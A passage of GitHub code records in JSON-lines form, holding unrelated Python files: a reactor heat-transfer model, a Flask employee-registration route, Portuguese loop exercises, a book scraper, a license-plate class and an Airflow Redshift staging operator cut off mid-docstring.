level_or_option=zstd_coption)\n else:\n ofile = open(odatapath, \"wb\")\n\n\n n_req = 0\n request_de = deque()\n should_remove = True\n first_ts = -1\n for line in ifile:\n n_req += 1\n ls = line.split(\",\")\n if len(ls) != 7:\n ls_tmp = ls[:]\n ls = [ls_tmp[0], \",\".join(ls_tmp[1:-5]), *ls_tmp[-5:]]\n if len(ls) != 7:\n print(\"parse error {} {}\".format(line, ls))\n line = ifile.readline()\n continue\n\n ts, key, klen, vlen, client, op, ttl = ls\n ts, klen, vlen, ttl = int(ts), int(klen), int(vlen), int(ttl)\n request_de.append((ts, line))\n while len(request_de) > 10 and (request_de[-1][0] - request_de[0][0]) > 60:\n request_de.popleft()\n if should_remove:\n if len(request_de) > 100 * 60:\n should_remove = False \n first_ts = ts \n print(\"drop {} requests timestamp {}\".format(n_req, ts))\n else:\n ts -= first_ts\n ofile.write((\",\".join([\"{}\".format(i) for i in [ts, key, klen, vlen, client, op, ttl]]) + \"\\n\").encode(\"ascii\"))\n\n\nif __name__ == \"__main__\":\n tracepath, odatapath = sys.argv[1], sys.argv[2]\n remove_head(tracepath, odatapath)\n\n","repo_name":"1a1a11a/libCacheSim","sub_path":"scripts/priv/traceUtils/customized/twr_remove_head.py","file_name":"twr_remove_head.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"19"} +{"seq_id":"12494646952","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy import integrate\nimport matplotlib.pyplot as plt\n\nt0 = 352 + 273.15 # °K (335-415°C Betriebstemperatur)\nt = t0\np = 1 # atm\n# Ordnung für die Eigenschaften: N2, O2, Ar, Benzol\nkomponente = np.array(['N2', 'O2', 'Ar', 'Benzol'])\ny_i = np.array([78,21,1,1.82])/sum(\n np.array([78,21,1,1.82], dtype=float))\nmm_g = np.array([28, 32, 40, 78.11]) # g/mol\n# IG-Eigenschaften\nrho_g = 101325./(8.314*t)*mm_g/1000. 
# kg/m^3\n# VDI Wärmeatlas - Cv bei 352°C\n# Gasen bei 352°C\ncv_g = np.array([\n (0.7640-0.7500)/(400-350)*(352-400)+0.7640 ,\n (0.795-0.783)/(400-350)*(352-400)+0.795 ,\n 3/2*8.3145/40,\n (2.212-1.991)/(400-300)*(352-400)+2.212 ,\n])\n# kJ/(kg K) = J/g/K\ncp_g = (8.3145+cv_g*mm_g)/mm_g # Nach Idealgasmodell\n# Lennard-Jones Parameter (Bird Tabelle E.1)\nl_j_epsilon_d_k = np.array([99.8,113,122.4,387.]) # K\nl_j_sigma = np.array([3.667,3.433,3.432,5.443]) # Angstrom\nk_t_d_e = t / l_j_epsilon_d_k\n# Stoßintegral (Bird Tabelle E.2)\nstossintegral_k_mu = interp1d(\n [1.60,1.65,5.0, 6.0, 7.0],\n [1.280,1.264,0.9268,0.8962,0.8727]\n)(k_t_d_e)\nkonst_1 = 5 / 16 * np.sqrt(\n 1.3806e-23 * 1000 * 100**2 / 6.022e23 / np.pi\n) * (10**10 / 100)**2 # 1/cm/s\nkonst_2 = (9 / 4 * 8.3145 + cv_g * mm_g\n ) * 1 / 4.184 * konst_1 # cal/cm/s/K\nmu = konst_1 * np.sqrt(mm_g * t) / (\n l_j_sigma**2 * stossintegral_k_mu)*100/1000.\n# g/cm/s * 100cm/1000g * 1kg/m = kg/m/s = Pa s\nk = konst_2 * np.sqrt(t / mm_g) / (\n l_j_sigma**2 * stossintegral_k_mu\n) * 4.184 * 100 # W/m/K\n\ndef phi_alpha_beta(mm_i, mu):\n phi_ab = np.zeros([mm_i.size, mu.size])\n for alpha in range(phi_ab.shape[0]):\n for beta in range(phi_ab.shape[1]):\n phi_ab[alpha, beta] = 1/np.sqrt(8)*(\n 1+mm_i[alpha]/mm_i[beta])**(-1/2.)*(\n 1+(mu[alpha]/mu[beta])**(1/2.)*(\n mm_i[beta]/mm_i[alpha]\n )**(1/4.)\n )**2\n return phi_ab\n\nmu_mix = sum(y_i * mu / phi_alpha_beta(\n mm_g,mu).dot(y_i))\nk_mix = sum(y_i * k / phi_alpha_beta(\n mm_g,k).dot(y_i))\n\n# Eigenschaften als konstant für die Mischung angenommen\nrho_g = (sum(y_i * rho_g/mm_g)*sum(y_i * mm_g)).item()\ncp_g = (sum(y_i * cp_g/mm_g)*sum(y_i * mm_g)).item()\ncv_g = (sum(y_i * cv_g/mm_g)*sum(y_i * mm_g)).item()\nmm_g = sum(y_i * mm_g).item()\nk = k_mix\nmu = mu_mix\nlambda_g = k_mix\n\noutput = [\n 'Prozessstrom, Luft mit verdünntem o-Xylen-Anteil',\n 'mm = ' + '{:g}'.format(mm_g) + ' ' + 'g/mol',\n 'cv_g = ' + '{:g}'.format(cv_g) + ' ' + 'kJ/kg/K' +\n ' (VDI-Wärmeatlas)',\n 'cp_g = ' + '{:g}'.format(cp_g) + ' ' + 'kJ/kg/K' +\n ' ... = (cv_g*M+R)/M Idealgas',\n 'rho_g = ' + '{:g}'.format(rho_g) + ' ' + 'kg/m^3' +\n ' ... Idealgas',\n 'Bird Tabelle E.1: ',\n 'epsilon/k = ' + str(l_j_epsilon_d_k) + ' ' + 'K',\n 'sigma = ' + str(l_j_sigma) + ' ' + 'Angstrom',\n 'Bird Tabelle E.2: ',\n 'Omega_mu=Omega_k = ' + str(\n stossintegral_k_mu) + ' ',\n 'Bird Gl. 1.4-14, 1.4-15, 1.4-16, 9.3-13: ',\n 'mu = ' + '{:g}'.format(mu) + ' ' + 'Pa s',\n 'k = ' + '{:g}'.format(k) + ' ' + 'W/m/K',\n 'k = lambda_g = ' + '{:g}'.format(\n k*1/4.184*60**2) + ' ' + 'kcal/m/h/°C'\n]\nprint('\\n'.join(output))\n\n# Wasser als Kühlmittel: Gesättigte Flüssigkeit bei\n# 230°C, 27,968 bar\nrho_l = 827.12 # kg/m^3\ncp_l = 4.68318 # kJ/kg/K\nlambda_l = 636.6*1e-3 # W/m/K\neta_l = 116.2*1e-6 # Pa s\npr_l = eta_l/(lambda_l/(cp_l*1000)) # [dimlos]\nd_i = 2.54*np.sqrt(2500)/2.6/np.sqrt(33*2)*31.0 / 100 #m\n# Wanddicke und Wärmeleitfähigkeit: St. 35.8. (1.0305)\nw_d = 0.133 * 1 / 12 * 30.48 / 100. # m\nlambda_m = (\n (45 - 50) / (400 - 300) * (352 - 400) + 45\n ) * 1 / 4.184 / 1000. 
* 60 ** 2 # kcal/h/m^2/K\nre_l = (\n 1/(1/82.7-1/88.9339 - w_d/lambda_m\n )*1000*4.184/60**2 * \\\n d_i/lambda_l/(pr_l**0.333)/0.026)**(1/0.8)\nxi_l = (1.8*np.log10(re_l)-1.5)**(-2.)\nnu_l = xi_l/8.*re_l*pr_l/(\n 1+12.7*np.sqrt(xi_l/8.)*(pr_l**(2/3.)-1)\n)*(1+(0.)**(2/3)) # d_i/l<<1\n# (wesentlich höhere Länge als Durchmesser)\nnu_l = 0.026*re_l**0.8*pr_l**0.333*1**0.14 # Bird\nalpha_o = nu_l * lambda_l/d_i * \\\n 60**2 * 1/4.184 * 1/1000 # W/m/K * 1000cal/4184J *\n# 60^2s/h\noutput = [\n 'Kühlmittel: Wasser bei Sättigung bei 230°C '+\n '(28bar) (VDI-Wärmeatlas)',\n 'rho_l = ' + '{:g}'.format(rho_l) + ' kg/m^3',\n 'cp_l = ' + '{:g}'.format(cp_l) + ' kJ/kg/K',\n 'eta_l = ' + '{:g}'.format(eta_l) + ' Pa s',\n 'Pr_l = ' + '{:g}'.format(pr_l) + ' ',\n 'Voll-ausgebildete turbulente Strömung:',\n 'Re_l = ' + '{:g}'.format(re_l) + ' ',\n 'Nusselt-Zahl bei voll-ausgebildeter turbulenter' +\n 'Strömung (Gl. 26 Kap. G1 VDI-Wärmeatlas)',\n 'xi_l = ' + '{:g}'.format(xi_l) + ' ',\n 'Nu_l = ' + '{:g}'.format(nu_l) + ' ',\n 'Bezugslänge: Innendurchmesser des Rohrbündels ' +\n 'mit 2500 Rohren, je 2,54cm',\n 'd_i = ' + '{:g}'.format(d_i) + ' m',\n 'Wärmeübergangskoeffizient im Mantel',\n 'alpha_o = ' + '{:g}'.format(alpha_o) +\n ' kcal/h/m^2/°C',\n]\nprint('\\n'.join(output))\n\nl_r = 3 # m\nd = 2.54 * 1 / 100. # m\nn = 2500 # Rohre\nt = t0\ndp = 3 / 1000. # m\nrho_b = 1300 # Bulk density = rhoc*(1-phi) # kgKat/m^3\nya0 = 1 / 100. # < 1 mol%\np = 1 # atm\nn_p = 1650 # t/a\ng = 1650*1000./365./24./2500./(3.14/4*0.025**2)\n# kg / m^2/h * 1h/(60^2 s) = kg/m^2/s\ng = 4684 # kg / m^2/h * 1h/(60^2 s) = kg/m^2/s\nrho_g = 1.293 # kg/m^3\nu_s = g / rho_g # kg/m^2/h / kg*m^3 = m/h\ndelta_h_r = -307000. # kcal/kmol\ncp = 0.237 # kcal/(kg °C)\npb0 = y_i[1] * 1 # atm\n\nre = dp * g / mu * 1/60.**2 # [=] m * kg/m^2/h /kg *m*s\n# = [dimlos]\npr = mu / (lambda_g / (cp_g*4.184*1000)) # [dimlos]\n# Levas Korrelation\nnu = 3.50 * (re) ** 0.7 * np.exp(-4.6 * dp / d)\nalpha_i = nu * lambda_g / d / 4.184 / 1000 * 60 ** 2 # W/m^2/K\n# * 1cal/4.184J * 1kcal/1000cal * 60^2s/h = kcal/h/m^2/K\nu = 1 / (1 / alpha_i + w_d / lambda_m + 1 / alpha_o)\n\n\ndef df_dy(y, z0):\n p = y[0]\n t = y[1]\n k_t = np.exp(19.837 - 13636 / t)\n # k_t[=] kmol/kgKat/h * atm^-2\n r_a = k_t * pb0 * p # kmol/kgKat/h\n dp_dz = -mm_g * 1 * rho_b / rho_g * r_a / u_s\n dt_dz = -delta_h_r / (\n rho_g * cp\n ) * rho_b * r_a / (u_s) - 4 / d * u / (\n rho_g * cp) / (u_s) * (t - t0)\n return np.array([dp_dz, dt_dz])\n\n\nz = np.linspace(0, 3.0, 100)\n\npb0 = y_i[1] * 1 # atm\nmm_g = np.array([28, 32, 40, 78.11]) # g/mol\nmm_g = sum(y_i * mm_g).item()\np0_t0 = np.array([y_i[-1] * 1, t0])\ny, info = integrate.odeint(\n df_dy, p0_t0, z, full_output=True\n)\n\noutput = [\n 'Prozessstrom Kennzahlen',\n 'Pr = ' + '{:g}'.format(pr) + ' ',\n 'Re = ' + '{:g}'.format(re) + ' ',\n 'Nusselt-Zahl mit ruhenden Feststoffpartikeln\\n' +\n '(Schüttschicht), nach Levas Korrelation in \\n' +\n 'Behr Gmehling Techn. 
Chemie',\n 'Nu = ' + '{:g}'.format(nu) + ' ',\n 'Bezugslänge: Innendurchmesser des Rohrbündels ',\n 'd = ' + '{:g}'.format(d) + ' m',\n 'Wärmeübergangskoeffizient im Rohr',\n 'alpha_i = ' + '{:g}'.format(alpha_i) +\n ' kcal/h/m^2/°C',\n 'Mittlerer Wärmeübergangskoeffizient',\n 'U = ' + '{:g}'.format(u) +\n ' kcal/h/m^2/°C',\n]\nprint('\\n'.join(output))\n\nfig = plt.figure(figsize=(20 * 12 / 30.48, 30 * 12 / 30.48))\nax1 = plt.subplot(211)\nplt.setp(ax1.get_xticklabels(), visible=False)\nax2 = plt.subplot(212, sharex=ax1)\nax1.set_ylim([0, 0.02])\nax2.set_ylim([625, 725])\nax1.set_xlim([0, 1.25])\nax1.set_ylabel('$p_0 / atm$')\nax2.set_ylabel('T / K')\nax2.set_xlabel('z / m')\n\nfor p0 in [0.011, 0.012, 0.013, 0.015,\n 0.016, 0.017, 0.018, 0.0181,\n 0.0182, 0.019]:\n y_i = np.array([78, 21, 1, p0 * 100]) / sum(\n np.array([78, 21, 1, p0 * 100], dtype=float))\n pb0 = y_i[1] * 1 # atm\n # mm_g = np.array([28, 32, 40, 78.11]) # g/mol\n # mm_g = sum(y_i * mm_g).item()\n p0_t0 = np.array([y_i[-1], t0])\n y, info = integrate.odeint(\n df_dy, p0_t0, z, full_output=True\n )\n\n ax1.plot(z, y[:, 0], label=str(p0))\n ax2.plot(z, y[:, 1], label=str(p0))\n index_max = np.argmax(y[:, 1])\n x_max = z[index_max]\n y_max = y[index_max, 1]\n ax2.annotate('$p_0=' + str(p0) + '$',\n xy=(x_max, y_max))\n\nax1.legend()\nax2.legend();\nplt.show()","repo_name":"santiago-salas-v/walas","sub_path":"bsp_11_5_b_fr_b.py","file_name":"bsp_11_5_b_fr_b.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27035971710","text":"from datetime import datetime\n\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\nfrom .models import Employee, Vaccine, Covid_cases\nfrom . 
import db\nfrom flask_login import current_user\n\nadd_employee = Blueprint('add_employee', __name__)\n\n\ndef is_valid_id(id_number):\n id_number = str(id_number).strip()\n if len(id_number) != 9:\n return False\n if not id_number.isdigit():\n return False\n id_sum = 0\n for i, digit in enumerate(id_number[:-1]):\n weight = (i % 2) + 1 # משקל הספרה תלוי במיקום שלה במספר\n digit_sum = sum(int(d) for d in str(int(digit) * weight))\n id_sum += digit_sum\n check_digit = (10 - (id_sum % 10)) % 10\n return check_digit == int(id_number[-1])\n\n\n@add_employee.route('/create-employee', methods=['GET', 'POST'])\ndef create_employee():\n if request.method == 'POST':\n first_name = request.form.get('firstName')\n last_name = request.form.get('lastName')\n id_number = request.form.get('idNumber')\n address_city = request.form.get('addressCity')\n address_street = request.form.get('addressStreet')\n address_number = request.form.get('addressNumber')\n birth_date = None\n date_str = request.form.get('birthDate')\n # birth_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n if date_str:\n birth_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n phone_number = request.form.get('phoneNumber')\n mobile_number = request.form.get('mobileNumber')\n date_str = request.form.get('vaccine1Date')\n vaccine1_date = None\n if date_str:\n vaccine1_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine1_manufacturer = request.form.get('vaccine1Manufacturer')\n date_str = request.form.get('vaccine2Date')\n vaccine2_date = None\n if date_str:\n vaccine2_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine2_manufacturer = request.form.get('vaccine2Manufacturer')\n date_str = request.form.get('vaccine3Date')\n vaccine3_date = None\n if date_str:\n vaccine3_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine3_manufacturer = request.form.get('vaccine3Manufacturer')\n date_str = request.form.get('vaccine4Date')\n vaccine4_date = None\n if date_str:\n vaccine4_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine4_manufacturer = request.form.get('vaccine4Manufacturer')\n date_str = request.form.get(\"positiveResultDate\")\n positive_result_date = None\n if date_str:\n positive_result_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n date_str = request.form.get(\"recoveryDate\")\n recovery_date = None\n if date_str:\n recovery_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n\n employee = Employee.query.filter_by(id_number=id_number).first()\n if employee:\n flash('מספר זהות כבר קיים במערכת', category='error')\n elif not is_valid_id(id_number):\n flash('מספר זהות לא תקין', category='error')\n elif len(phone_number) < 9:\n flash('מספר טלפון חייב להכיל יותר מ-8 תווים', category='error')\n elif len(mobile_number) < 10:\n flash('מספר נייד חייב להכיל יותר מ-8 תווים', category='error')\n elif len(first_name) < 2:\n flash('שם פרטי חייב להכיל יותר מתו אחד', category='error')\n elif len(last_name) < 2:\n flash('שם משפחה חייב להכיל יותר מתו אחד', category='error')\n elif len(address_city) < 2:\n flash('שם העיר חייב להכיל יותר מתו אחד', category='error')\n elif len(address_street) < 2:\n flash('שם רחוב חייב להכיל יותר מתו אחד', category='error')\n elif len(address_number) < 1:\n flash('חובה להכניס מספר בית', category='error')\n elif birth_date is None:\n flash('חובה להכניס תאריך לידה', category='error')\n elif positive_result_date is not None and positive_result_date > recovery_date:\n flash('תאריך תוצאה חיובית חייב להיות לפני תאריך החלמה', category='error')\n else:\n 
new_employee = Employee(first_name=first_name, last_name=last_name, id_number=id_number,\n address_city=address_city, address_street=address_street,\n address_number=address_number, birth_date=birth_date, phone_number=phone_number,\n mobile_number=mobile_number)\n db.session.add(new_employee)\n db.session.commit()\n last_employee = db.session.query(Employee).order_by(Employee.id.desc()).first()\n last_employee_id = last_employee.id\n\n vaccine1 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine1_date,\n vaccine_manufacturer=vaccine1_manufacturer)\n vaccine2 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine2_date,\n vaccine_manufacturer=vaccine2_manufacturer)\n vaccine3 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine3_date,\n vaccine_manufacturer=vaccine3_manufacturer)\n vaccine4 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine4_date,\n vaccine_manufacturer=vaccine4_manufacturer)\n\n covid_case = Covid_cases(employee_id=last_employee_id, positive_result_date=positive_result_date,\n recovery_date=recovery_date)\n\n if vaccine1:\n db.session.add(vaccine1)\n db.session.commit()\n if vaccine2:\n db.session.add(vaccine2)\n db.session.commit()\n if vaccine3:\n db.session.add(vaccine3)\n db.session.commit()\n if vaccine4:\n db.session.add(vaccine4)\n db.session.commit()\n if covid_case:\n db.session.add(covid_case)\n db.session.commit()\n #\n # file = request.files['fileInput']\n # file.save(file.filename)\n\n flash('העובד נוסף בהצלחה!', category='success')\n return redirect(url_for('add_employee.create_employee'))\n\n return render_template(\"add_employee.html\", user=current_user)\n\n\n\n","repo_name":"esterblass/Hadasim_exe","sub_path":"Covid_wesite/website/add_employee.py","file_name":"add_employee.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14331451582","text":"#Exercícios de fixação WHILE (lista 1)\n\n'''\nExercício 1. Crie um programa que pede para o usuário digitar o nome de 13 pessoas\npelo teclado.\n'''\ndef coletarNomes():\n i = 0\n nomes = []\n while i < 13:\n nomes.append(input(\"Digite um nome: \"))\n i += 1\n print(nomes)\n\n#coletarNomes()\n \n'''\nExercício 2. Crie um programa que imprime os números de 0 a 1000.\n'''\n\ndef imprimirNumeros1000():\n i = 0\n while i <= 1000:\n print(i)\n i += 1 \n\n#imprimirNumeros1000()\n\n'''\nExercício 3. Crie um programa que imprime os números pares de 0 a 2000.\n'''\ndef imprimirPares2000():\n i = 0\n while i <= 2000:\n if i % 2 == 0:\n print(i)\n i += 1 \n\n#imprimirPares2000()\n\n'''\nExercício 4. Crie um programa que imprime os números de 0 a 1000 em ordem\ndecrescente (ou seja, de 1000 a 0).\n'''\n\ndef imprimirNumeros1000Decrescente():\n i = 1000\n while i >= 0:\n print(i)\n i -= 1 \n\n#imprimirNumeros1000Decrescente()\n\n\n'''\nExercício 5. Crie um programa que solicita o time de 10 usuários pelo teclado. Ao final,\nimprima quantos torcedores torcem para o Grêmio.\n'''\ndef contarTorcedores():\n \n torcedoresGremio = 0\n i = 0\n \n while i < 10:\n \n if input(\"Digite seu time: \").lower() == \"grêmio\":\n torcedoresGremio += 1\n \n i += 1\n \n print(f\"O número de torcedores do Grêmio é {torcedoresGremio}.\")\n\n#contarTorcedores()\n\n\n'''\nExercício 6. Crie um programa que pede para o usuário digitar 20 números com ponto\nflutuante pelo teclado. Ao final, seu programa deve imprimir todos os números\ndigitados. Dica: armazene-os em uma string e concatene os valores digitados. 
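# Illustrative sketch (not part of the original module): the is_valid_id
# helper in add_employee.py above implements the Luhn-style check digit of
# Israeli ID numbers -- digits are weighted 1,2,1,2,..., two-digit products
# are reduced to their digit sum, and the weighted total must end in 0.
def luhn_like_check(id_number: str) -> bool:
    """Equivalent full-sum form of the check implemented above."""
    if len(id_number) != 9 or not id_number.isdigit():
        return False
    total = 0
    for i, ch in enumerate(id_number):
        prod = int(ch) * ((i % 2) + 1)            # weight 1 or 2 by position
        total += prod - 9 if prod > 9 else prod   # digit sum of the product
    return total % 10 == 0

# e.g. luhn_like_check("123456782") is True; changing any single digit breaks it.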
No final,\nimprima a string.\n'''\n\ndef digitarFlutuantes():\n\n numeros = 0.0\n i = 1\n\n while i <= 20:\n\n numeros = numeros + float(input(f\"Digite o {i}º número flutuante: \"))\n \n i += 1\n\n print(f\"O resultado da soma é {numeros}.\")\n\n#digitarFlutuantes()\n\n\n\n\n'''\nExercício 7. Crie um programa que solicita para o usuário que ele digite 10 valores\ninteiros. Ao final, imprima a soma de todos os valores digitados.\n'''\n\ndef digitarInteiros():\n\n numeros = 0\n i = 1\n\n while i <= 10:\n\n numeros = numeros + int(input(f\"Digite o {i}º número inteiro: \"))\n \n i += 1\n\n print(f\"O resultado da soma é {numeros}.\")\n\n#digitarInteiros()\n\n\n\n'''\nExercício 8. Crie um programa que pergunta para o usuário (via Teclado) quantos\nnúmeros ele irá digitar e armazena em uma variável chamada quant. Logo após, faça\ncom que o usuário digite quant números inteiros, e para cada número digitado imprima\nna tela se o número é negativo, positivo ou zero.\n'''\n\ndef criarQuantidadeNumeros():\n\n i = 0\n\n quantidade = int(input(\"Digite a quantidade de números a serem armazenados: \"))\n\n while i < quantidade:\n\n numeroTeste = int(input(\"Digite um número a ser testado: \"))\n\n if numeroTeste == 0:\n print(\"O número é zero.\")\n \n \n elif numeroTeste > 0:\n print(f\"{numeroTeste} é positivo.\")\n \n else:\n print(f\"{numeroTeste} é negativo.\")\n\n i += 1\n\n\n\n#criarQuantidadeNumeros()\n \n\n\n\n'''\nExercício 9. Crie um programa que pede para o usuário digitar 2 valores inteiros via\nTeclado (val1 e val2). Se nenhum dos valores for negativo, escreva os números pares\nentre o menor e o maior valor.\n'''\n\ndef numerarParesRange():\n\n val1 = abs(int(input(\"Digite o primeiro valor: \")))\n val2 = abs(int(input(\"Digite o segundo valor: \")))\n\n maiorNumero = val1 if val1 > val2 else val2\n menorNumero = val1 if val1 < val2 else val2\n \n while menorNumero < maiorNumero:\n if menorNumero % 2 == 0:\n print(menorNumero)\n menorNumero += 1\n\n#numerarParesRange()\n\n\n'''\nExercício 10. Crie um programa que faça a soma dos valores de 0 até 198.\n'''\n\ndef somar198():\n\n somatorio = 0\n\n i = 0\n\n while i < 198:\n\n somatorio = somatorio + i\n \n i += 1\n\n print(somatorio)\n\n\n#somar198()\n\n'''\nExercício 11. Crie um programa que imprima a soma dos valores pares e a soma dos\nvalores ímpares entre dois números quaisquer digitados pelo usuário.\n'''\n\ndef somaParImparRange():\n \n val1 = abs(int(input(\"Digite o primeiro valor: \")))\n val2 = abs(int(input(\"Digite o segundo valor: \")))\n\n maiorNumero = val1 if val1 > val2 else val2\n menorNumero = val1 if val1 < val2 else val2\n\n somatorioPares = 0\n somatorioImpares = 0\n \n while menorNumero < maiorNumero:\n if menorNumero % 2 == 0:\n somatorioPares = somatorioPares + menorNumero\n\n else:\n somatorioImpares = somatorioImpares + menorNumero\n \n menorNumero += 1\n\n print(f\"Somatório dos números pares: {somatorioPares}\")\n print(f\"Somatório dos números ímpares: {somatorioImpares}\")\n\n#somaParImparRange()\n\n\n'''\nExercício 12. Crie um programa que pede para o usuário digitar números positivos via\nTeclado. 
Quando o usuário digitar um número negativo, informe a média de todos os\nnúmeros que ele informou.\n'''\n\ndef somarPositivos():\n\n numeroDigitado = 1\n denominador = 0\n somatorio = 0\n\n while numeroDigitado:\n\n resposta = int(input(\"Digite um número a ser somado: \"))\n\n if resposta < 0:\n\n numeroDigitado = 0\n\n print(f\"A média do somatório é {somatorio/denominador}.\")\n\n denominador += 1\n\n somatorio += resposta\n\n#somarPositivos()\n\n\n'''\nExercício 13. Crie um programa que calcule o fatorial de um número informado pelo\nusuário (não permita números negativos).\n'''\n\ndef calcularFatorial():\n\n i = 0\n\n fatorial = abs(int(input(\"Digite um número para calcular o fatorial: \")))\n \n i = fatorial\n\n while i > 1:\n \n fatorial = fatorial * (i - 1)\n\n i -= 1\n\n print(f\"O resultado do cálculo fatorial é: {fatorial}\")\n\n#calcularFatorial()\n\n'''\nExercício 14. Crie um programa que diga se o número informado pelo usuário é primo\nou não.\n'''\n\ndef definirPrimo():\n\n resposta = abs(int(input(\"Digite um número para saber se ele é primo: \")))\n \n numeroDivisores = 0\n \n i = resposta \n\n while i > 0:\n\n if resposta % i == 0:\n numeroDivisores += 1\n\n if numeroDivisores > 2:\n print(f\"{resposta} não é número primo.\")\n return\n \n i -= 1\n\n print(f\"{resposta} é número primo\")\n\n#definirPrimo()\n\n\n'''\nExercício 15. Crie um programa que imprime os números primos entre 0 e 200,\nimprimindo ao final a soma destes números.\n'''\n\ndef somarPrimos200():\n \n displayNumeros = []\n\n somatorioPrimos = 0\n\n numeroDivisores = 0\n\n numero = 200\n \n i = numero \n\n while numero > 0:\n\n numeroDivisores = 0\n\n i = numero\n\n while i > 0:\n \n if numero % i == 0:\n numeroDivisores += 1\n\n i -= 1 \n\n if numeroDivisores == 2:\n somatorioPrimos += numero\n displayNumeros.append(numero)\n \n numero -= 1\n\n \n print(f\"\\nLista de números primos:\\n\\n{displayNumeros}\")\n print(f\"\\nSomatório de números primos: {somatorioPrimos}\")\n\n\n#somarPrimos200()\n\n","repo_name":"aindadecarbono/unisinos-exercicios","sub_path":"lab-1/s3-s4/ex-s3-s4-while1.py","file_name":"ex-s3-s4-while1.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39367147079","text":"from book_module import scrap_book\nfrom one_category_module import scrap_category\nfrom category_module import get_all_categories\nfrom io_module import export_to_csv, create_dir, clean_files, save_image\n\n# Importer un module depuis un subfolder\n# → https://stackoverflow.com/questions/8953844/import-module-from-subfolder\n\ndef main():\n \"Entry point\"\n print(\"~~~~~~~~~~~~\")\n print(\"~~~ main ~~~\")\n print(\"~~~~~~~~~~~~\")\n\n all_categories = get_all_categories()\n\n for category in all_categories:\n print(f\"→ getting all books' urls from category: {category.name}\")\n print(\"-----------------------------------------------\")\n\n index = 0 # we track index to have a row number in csv\n books_data = []\n books_urls = scrap_category(category)\n\n dir_prefix = \"data\"\n cat_dir_path = dir_prefix + '/' + category.name.lower()\n\n create_dir(dir_prefix)\n create_dir(cat_dir_path)\n\n for book_url in books_urls:\n index += 1\n book_data = scrap_book(book_url)\n\n book_data.insert(0, index)\n books_data.append(book_data)\n\n\n last_arr_index = len(book_data) - 1\n image_url = book_data[last_arr_index]\n image_path_to_save = f\"{cat_dir_path}/{(book_data[3]).replace('/','')}\"\n\n save_image(image_url, 
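# Illustrative sketch (not part of the original exercises): definirPrimo and
# somarPrimos200 above count every divisor of n, i.e. O(n) work per number.
# Trial division only has to test candidates up to sqrt(n):
def eh_primo(n: int) -> bool:
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True

# Same result as the exercise: sum(n for n in range(201) if eh_primo(n)) == 4227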
image_path_to_save)\n\n export_to_csv(category, books_data, cat_dir_path)\n \n # limit the process to 1 category\n # remove the \"return True\" to process all categories\n \n\ndef dir_test():\n \"Dir test\"\n #create_dir(\"img_2\")\n clean_files(\".jpg\")\n\nmain()","repo_name":"MAM95190/projet_2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21249364762","text":"import cv2\nimport numpy as np\n\nclass PossiblePlate:\n\t\"\"\"\n\t:self.imgPlate: original image\n\t:self.imgGrayscale: grayscale image\n\t:self.imgThresh: thresholded image\n\t:self.rrLocationOfPlateInScene: rectangle location in scene\n\t:self.strChars: plate value found\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.imgPlate = None\n\t\tself.imgGrayscale = None\n\t\tself.imgThresh = None\n\t\tself.rrLocationOfPlateInScene = None\n\t\tself.strChars = \"\"","repo_name":"aseams/License-Plate-Recognition","sub_path":"PossiblePlate.py","file_name":"PossiblePlate.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"8934036520","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom airflow.contrib.hooks.aws_hook import AwsHook\nimport datetime\n\nclass StageToRedshiftOperator(BaseOperator):\n \"\"\" Airflow Operator to load stage tables by reading in data from S3.\n Data may be either in JSON or CSV format. \n Args:\n * aws_credentials_id: AWS credentials to read from S3\n * redshift_conn_id : Redshift connection ID\n * table: Staging table to load from data file in S3\n * s3_source: S3 source that has the staging files\n * json_paths: JSON paths of stage data files\n * file_type: File type of data files. JSON for example\n * delimiter: Delimiter used in stage data file\n * execution_date: Date of airflow run\n * backfill: Boolean flag indicating if backfill of data is needed\n \"\"\"\n \n ui_color = '#358140'\n\n @apply_defaults\n def __init__(self, \n aws_credentials_id=\"\",\n redshift_conn_id=\"\",\n table=\"\",\n s3_source=\"\",\n file_type= \"\", #CSV or JSON\n json_paths=\"\",\n delimiter=\",\",\n ignore_headers=1,\n execution_date=\"\",\n backfill=False,\n *args, **kwargs):\n\n super(StageToRedshiftOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.aws_credentials_id = aws_credentials_id\n self.table = table\n self.s3_source = s3_source\n self.file_type = file_type\n self.json_paths = json_paths\n self.delimiter = delimiter\n self.ignore_headers = ignore_headers\n self.execution_date = execution_date\n self.backfill = backfill\n\n def execute(self, context):\n ''' Copy data from S3 into stage table. 
